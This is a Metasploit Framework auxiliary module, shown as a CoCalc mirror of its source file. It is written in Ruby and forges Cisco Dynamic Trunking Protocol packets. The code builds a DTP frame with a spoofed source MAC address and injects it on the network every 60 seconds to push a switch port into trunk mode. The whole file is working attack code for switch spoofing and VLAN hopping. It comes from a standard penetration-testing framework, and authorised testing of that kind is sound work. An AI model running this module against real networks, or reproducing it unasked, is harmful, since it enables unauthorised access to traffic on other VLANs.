CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/spoof/cisco/dtp.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Capture

8


9
  def initialize(info = {})

10
    super(

11
      'Name'        => 'Forge Cisco DTP Packets',

12
      'Description'	=> %q{

13
        This module forges DTP packets to initialize a trunk port.

14
      },

15
      'Author'		=> [ 'Spencer McIntyre' ],

16
      'License'		=> MSF_LICENSE,

17
      'Actions'     =>

18
        [

19
          [ 'Service', 'Description' => 'Run DTP forging service' ]

20
        ],

21
      'PassiveActions' => [ 'Service' ],

22
      'DefaultAction'  => 'Service'

23
    )

24
    register_options(

25
      [

26
        OptString.new('SMAC',    	[false, 'The spoofed mac (if unset, derived from netifaces)']),

27
      ])

28
    deregister_options('RHOST', 'PCAPFILE')

29
  end

30


31
  def setup

32
    super

33
    unless datastore['SMAC'] || datastore['INTERFACE']

34
      raise ArgumentError, 'Must specify SMAC or INTERFACE'

35
    end

36
  end

37


38
  def build_dtp_frame

39
    p = PacketFu::EthPacket.new

40
    p.eth_daddr = '01:00:0c:cc:cc:cc'

41
    p.eth_saddr = smac

42
    llc_hdr =	"\xaa\xaa\x03\x00\x00\x0c\x20\x04"

43
    dtp_hdr =	"\x01"								# version

44
    dtp_hdr <<	"\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"		# domain

45
    dtp_hdr <<	"\x00\x02\x00\x05\x03"						# status

46
    dtp_hdr <<	"\x00\x03\x00\x05\x45"						# dtp type

47
    dtp_hdr <<	"\x00\x04\x00\x0a" << PacketFu::EthHeader.mac2str(smac)		# neighbor

48
    p.eth_proto = llc_hdr.length + dtp_hdr.length

49
    p.payload = llc_hdr << dtp_hdr

50
    p

51
  end

52


53
  def is_mac?(mac)

54
    !!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)

55
  end

56


57
  def smac

58
    @spoof_mac ||= datastore['SMAC']

59
    @spoof_mac ||= get_mac(datastore['INTERFACE']) if netifaces_implemented?

60
    return @spoof_mac

61
  end

62


63
  def run

64
    unless smac()

65
      print_error 'Source MAC (SMAC) should be defined'

66
    else

67
      unless is_mac? smac

68
        print_error "Source MAC (SMAC) `#{smac}' is badly formatted."

69
      else

70
        print_status "Starting DTP spoofing service..."

71
        open_pcap({'FILTER' => "ether host 01:00:0c:cc:cc:cc"})

72
        interface = datastore['INTERFACE'] || Pcap.lookupdev

73
        dtp = build_dtp_frame()

74
        @run = true

75
        while @run

76
          capture.inject(dtp.to_s)

77
          select(nil, nil, nil, 60)

78
        end

79
        close_pcap

80
      end

81
    end

82
  end

83
end

84


85